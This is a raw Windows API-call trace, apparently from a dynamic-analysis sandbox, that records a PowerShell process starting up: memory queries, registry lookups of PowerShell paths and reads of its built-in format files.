	[0088.719] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.722] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.725] VirtualQuery (in: lpAddress=0x14d758, lpBuffer=0x14e758, dwLength=0x1c | out: lpBuffer=0x14e758*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.725] VirtualQuery (in: lpAddress=0x14d758, lpBuffer=0x14e758, dwLength=0x1c | out: lpBuffer=0x14e758*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.725] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.727] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.737] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.737] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.738] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.743] GetLastError () returned 0xcb
	[0088.744] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.749] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.749] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.749] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.750] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.750] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.750] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.752] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.752] VirtualQuery (in: lpAddress=0x14d754, lpBuffer=0x14e754, dwLength=0x1c | out: lpBuffer=0x14e754*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e8dc | out: phkResult=0x14e8dc*=0x2cc) returned 0x0
	[0088.753] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e944, lpData=0x0, lpcbData=0x14e940*=0x0 | out: lpType=0x14e944*=0x1, lpData=0x0, lpcbData=0x14e940*=0x74) returned 0x0
	[0088.753] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e924, lpData=0x0, lpcbData=0x14e920*=0x0 | out: lpType=0x14e924*=0x1, lpData=0x0, lpcbData=0x14e920*=0x74) returned 0x0
	[0088.753] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e924, lpData=0x361778, lpcbData=0x14e920*=0x74 | out: lpType=0x14e924*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14e920*=0x74) returned 0x0
	[0088.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0088.753] GetLastError () returned 0xcb
	[0088.753] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14e924 | out: lpFileInformation=0x14e924*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.754] GetLastError () returned 0xcb
	[0088.754] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0088.755] GetLastError () returned 0xcb
	[0088.755] SetErrorMode (uMode=0x1) returned 0x1
	[0088.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0088.756] GetLastError () returned 0xcb
	[0088.756] SetErrorMode (uMode=0x1) returned 0x1
	[0088.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e918 | out: lpFileInformation=0x14e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0088.756] GetLastError () returned 0xcb
	[0088.756] SetErrorMode (uMode=0x1) returned 0x1
	[0088.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.756] GetLastError () returned 0xcb
	[0088.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.762] GetLastError () returned 0xcb
	[0088.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.762] GetLastError () returned 0xcb
	[0088.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.763] GetLastError () returned 0xcb
	[0088.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.763] GetLastError () returned 0xcb
	[0088.763] SetErrorMode (uMode=0x1) returned 0x1
	[0088.763] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0088.763] GetLastError () returned 0x0
	[0088.763] GetFileType (hFile=0x29c) returned 0x1
	[0088.763] SetErrorMode (uMode=0x1) returned 0x1
	[0088.763] GetFileType (hFile=0x29c) returned 0x1
	[0088.763] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.764] GetLastError () returned 0x0
	[0088.765] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.765] GetLastError () returned 0x0
	[0088.766] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.766] GetLastError () returned 0x0
	[0088.766] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.766] GetLastError () returned 0x0
	[0088.766] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.766] GetLastError () returned 0x0
	[0088.766] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x9e2, lpOverlapped=0x0) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] ReadFile (in: hFile=0x29c, lpBuffer=0x16ddba6, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16ddba6*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] ReadFile (in: hFile=0x29c, lpBuffer=0x16de624, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x16de624*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] CloseHandle (hObject=0x29c) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.767] GetLastError () returned 0x0
	[0088.767] SetErrorMode (uMode=0x1) returned 0x1
	[0088.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16ef6e0 | out: lpFileInformation=0x16ef6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0088.767] GetLastError () returned 0x0
	[0088.767] SetErrorMode (uMode=0x1) returned 0x1
	[0088.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.767] GetLastError () returned 0x0
	[0088.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0088.768] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.768] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0088.768] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.768] GetLastError () returned 0x0
	[0088.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0088.768] GetLastError () returned 0x0
	[0088.772] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x7789b309, Data2=0x3d94, Data3=0x462b, Data4=([0]=0xaa, [1]=0x49, [2]=0x91, [3]=0xcc, [4]=0xa1, [5]=0xd7, [6]=0xc8, [7]=0x5c))) returned 0x0
	[0088.782] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x657b885d, Data2=0x33fe, Data3=0x436b, Data4=([0]=0xa1, [1]=0x77, [2]=0xab, [3]=0xcf, [4]=0x56, [5]=0xcb, [6]=0xd0, [7]=0xde))) returned 0x0
	[0088.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0088.782] GetLastError () returned 0x0
	[0088.782] SetErrorMode (uMode=0x1) returned 0x1
	[0088.783] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0088.783] GetLastError () returned 0x0
	[0088.783] GetFileType (hFile=0x29c) returned 0x1
	[0088.783] SetErrorMode (uMode=0x1) returned 0x1
	[0088.783] GetFileType (hFile=0x29c) returned 0x1
	[0088.783] ReadFile (in: hFile=0x29c, lpBuffer=0x17029c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x17029c8*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0088.784] GetLastError () returned 0x0
